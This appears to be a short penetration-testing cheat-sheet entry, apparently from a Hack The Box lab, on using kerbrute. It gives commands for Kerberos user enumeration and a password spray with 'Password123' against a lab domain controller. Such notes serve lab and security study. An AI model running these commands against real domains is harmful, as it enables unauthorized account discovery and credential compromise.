kerbrute

Useful kerberos enumeration utility, can be used to enumerate valid users in a domain. User enumeration works when clock is skewed

./kerbrute_linux_amd64 userenum --dc 10.129.227.156 -d search.htb user_list.txt

Can be used to perform a password spray. Authentication will not work if hosts clock is more than five minutes off.

./kerbrute_linux_amd64 passwordspray --dc 10.129.227.156 -d search.htb users.txt 'Password123'

Can be downloaded here, for kali pick linux_amd64. https://github.com/ropnop/kerbrute/releases/tag/v1.0.3